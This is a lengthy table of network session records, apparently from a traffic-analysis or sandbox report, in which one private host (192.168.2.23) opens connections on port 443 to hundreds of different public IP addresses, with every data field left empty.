                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9714192.168.2.2352904122.37.142.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9715192.168.2.233438272.36.62.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9716192.168.2.2353668150.69.78.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9717192.168.2.2359848186.80.80.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9718192.168.2.2360874223.141.143.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9719192.168.2.234437073.242.217.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9720192.168.2.234680439.123.58.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9721192.168.2.2360234116.214.177.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9722192.168.2.234202246.64.112.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9723192.168.2.2335220104.212.108.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9724192.168.2.234869457.161.184.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9725192.168.2.235077490.157.123.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9726192.168.2.235812469.171.53.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9727192.168.2.235065690.40.98.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9728192.168.2.2355030219.150.240.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9729192.168.2.234433476.32.66.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9730192.168.2.234205432.219.51.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9731192.168.2.2343750140.4.46.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9732192.168.2.235725872.0.250.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9733192.168.2.2348140116.94.246.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9734192.168.2.235473477.143.53.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9735192.168.2.235763279.172.198.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9736192.168.2.2340360174.172.7.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9737192.168.2.2337808208.21.169.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9738192.168.2.234182625.172.227.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9739192.168.2.235576847.248.187.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9740192.168.2.2334756122.36.143.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9741192.168.2.234291818.13.146.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9742192.168.2.233746673.62.183.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9743192.168.2.235090424.238.215.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9744192.168.2.235152474.164.60.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9745192.168.2.234523871.236.122.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9746192.168.2.234264677.246.36.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9747192.168.2.2346854219.2.250.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9748192.168.2.2344818185.14.93.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9749192.168.2.2334618134.93.69.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9750192.168.2.2347784152.160.56.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9751192.168.2.2333622219.150.19.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9752192.168.2.2349376170.248.216.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9753192.168.2.2342774208.79.113.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9754192.168.2.235111696.181.230.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9755192.168.2.235639019.149.77.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9756192.168.2.2334868165.229.60.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9757192.168.2.236031447.11.47.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9758192.168.2.2335634151.177.1.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9759192.168.2.2353320219.226.11.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9760192.168.2.235962034.235.179.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9761192.168.2.2352478173.53.202.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9762192.168.2.2339070109.117.30.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9763192.168.2.234906466.177.63.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9764192.168.2.2359552171.250.201.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9765192.168.2.2336862144.82.172.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9766192.168.2.234660679.45.135.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9767192.168.2.2349538183.253.158.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9768192.168.2.236011265.110.53.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9769192.168.2.233479072.49.157.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9770192.168.2.2360414174.135.241.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9771192.168.2.233765484.48.146.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9772192.168.2.234671473.231.123.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9773192.168.2.2332968204.221.215.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9774192.168.2.2348402140.37.106.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9775192.168.2.2333926106.152.124.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9776192.168.2.235982279.235.237.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9777192.168.2.235798690.180.172.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9778192.168.2.235989882.253.81.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9779192.168.2.2356976175.172.157.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9780192.168.2.2346954161.225.107.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9781192.168.2.2346932102.84.239.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9782192.168.2.2360164131.0.119.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9783192.168.2.2356336219.243.149.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9784192.168.2.2344766220.48.163.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9785192.168.2.23601905.152.58.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9786192.168.2.2356660191.132.91.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9787192.168.2.2349432192.182.218.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9788192.168.2.23358888.220.76.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9789192.168.2.2355930109.206.198.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9790192.168.2.2349880199.205.101.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9791192.168.2.235734840.149.211.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9792192.168.2.2354708169.63.209.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9793192.168.2.2335466128.108.223.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9794192.168.2.2334378153.51.139.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9795192.168.2.2356798218.40.231.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9796192.168.2.2333054175.140.13.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9797192.168.2.2358234200.119.235.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9798192.168.2.235038884.146.254.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9799192.168.2.235835442.187.116.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9800192.168.2.235343860.226.95.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9801192.168.2.2339908221.116.123.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9802192.168.2.2352918188.10.178.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9803192.168.2.234669284.165.223.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9804192.168.2.2336482196.83.131.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9805192.168.2.2347356200.193.168.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9806192.168.2.2344694187.139.139.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9807192.168.2.233282464.202.249.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9808192.168.2.2346424149.232.160.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9809192.168.2.2333000116.115.41.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9810192.168.2.233373032.229.53.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9811192.168.2.2342958197.150.126.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9812192.168.2.2341182125.193.13.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9813192.168.2.2343498204.153.250.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9814192.168.2.2338650177.131.190.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9815192.168.2.2354380192.144.231.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9816192.168.2.2356378176.42.203.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9817192.168.2.2333816182.116.162.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9818192.168.2.233335098.125.62.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9819192.168.2.233979065.33.186.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9820192.168.2.2342416189.129.140.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9821192.168.2.2344174128.112.87.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9822192.168.2.2338776153.68.88.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9823192.168.2.2351096190.227.229.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9824192.168.2.2357612210.65.129.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9825192.168.2.2344508162.128.56.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9826192.168.2.23411349.103.245.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9827192.168.2.2354372103.218.204.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9828192.168.2.2341230106.9.17.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9829192.168.2.2344028142.74.131.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9830192.168.2.2342386157.16.186.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9831192.168.2.233819091.144.88.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9832192.168.2.235490697.37.149.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9833192.168.2.2354322196.170.236.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9834192.168.2.234579669.106.176.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9835192.168.2.2356974166.31.21.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9836192.168.2.2347790119.13.97.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9837192.168.2.2345810206.92.41.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9838192.168.2.2339872208.82.158.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9839192.168.2.233985099.213.136.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9840192.168.2.2352064159.179.199.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9841192.168.2.2358698156.92.129.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9842192.168.2.2358034119.211.172.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9843192.168.2.235776045.81.51.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9844192.168.2.235763464.214.107.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9845192.168.2.234019078.35.199.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9846192.168.2.2355910136.165.193.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9847192.168.2.2359628192.194.154.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9848192.168.2.234549886.38.177.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9849192.168.2.2348604114.55.91.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9850192.168.2.2350492129.32.184.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9851192.168.2.2354128112.109.230.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9852192.168.2.2348724110.195.170.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9853192.168.2.2349228188.6.160.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9854192.168.2.2357442185.180.82.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9855192.168.2.2354850135.69.94.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9856192.168.2.234239043.171.72.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9857192.168.2.2337266136.211.205.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9858192.168.2.2345646147.35.112.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9859192.168.2.235826839.52.63.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9860192.168.2.234249640.194.29.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9861192.168.2.235591466.42.79.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9862192.168.2.235901837.190.222.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9863192.168.2.2351316104.97.209.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9864192.168.2.2334854194.37.43.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9865192.168.2.234369646.125.184.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9866192.168.2.2360410101.160.45.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9867192.168.2.2351822200.196.39.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9868192.168.2.23341741.209.187.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9869192.168.2.233634268.164.230.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9870192.168.2.2360668220.176.68.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9871192.168.2.2338254170.87.109.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9872192.168.2.2350724109.176.131.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9873192.168.2.233673235.87.7.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9874192.168.2.2352228206.58.176.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9875192.168.2.2336808179.207.231.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9876192.168.2.233575288.47.242.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9877192.168.2.2345248196.105.181.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9878192.168.2.2349124101.115.65.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9879192.168.2.234027827.59.180.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9880192.168.2.235320437.86.48.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9881192.168.2.234248465.111.9.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9882192.168.2.235453835.170.20.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9883192.168.2.235509032.53.196.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9884192.168.2.2340690110.198.81.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9885192.168.2.2341104202.1.197.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9886192.168.2.234376068.82.7.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9887192.168.2.235754813.177.152.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9888192.168.2.2339048175.191.36.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9889192.168.2.235449253.101.233.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9890192.168.2.2341812191.39.65.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9891192.168.2.233826487.204.81.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9892192.168.2.2356402131.25.186.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9893192.168.2.2355116190.237.205.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9894192.168.2.234155424.153.174.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9895192.168.2.2347028131.28.127.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9896192.168.2.235975627.68.127.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9897192.168.2.2335714175.134.219.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9898192.168.2.2355960162.106.65.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9899192.168.2.2354500208.239.91.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9900192.168.2.235186681.185.170.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9901192.168.2.2339036195.228.235.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9902192.168.2.2356148173.141.135.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9903192.168.2.2359422107.229.32.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9904192.168.2.2351650101.17.49.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9905192.168.2.235969240.59.30.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9906192.168.2.2349550146.64.173.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9907192.168.2.2354916195.9.4.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9908192.168.2.2360750202.52.5.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9909192.168.2.235938457.153.139.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9910192.168.2.2352638166.34.57.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9911192.168.2.233853894.140.12.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9912192.168.2.233853482.193.141.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9913192.168.2.2339258205.82.179.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9914192.168.2.233638469.151.58.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9915192.168.2.2335722180.50.228.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9916192.168.2.2334842183.250.203.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9917192.168.2.2350442181.80.55.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9918192.168.2.2354408208.180.135.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9919192.168.2.2340772202.225.15.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9920192.168.2.2351606123.52.18.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9921192.168.2.234776861.128.57.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9922192.168.2.233426664.164.159.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9923192.168.2.234378014.236.185.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9924192.168.2.2348598220.136.13.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9925192.168.2.2334332134.221.196.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9926192.168.2.23361205.248.43.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9927192.168.2.233751881.213.232.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9928192.168.2.235035879.33.234.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9929192.168.2.2337578146.38.184.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9930192.168.2.2349396100.55.98.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9931192.168.2.2341576164.123.12.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9932192.168.2.233623067.159.65.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9933192.168.2.235188453.61.174.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9934192.168.2.235651283.218.154.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9935192.168.2.2356356120.159.110.241443
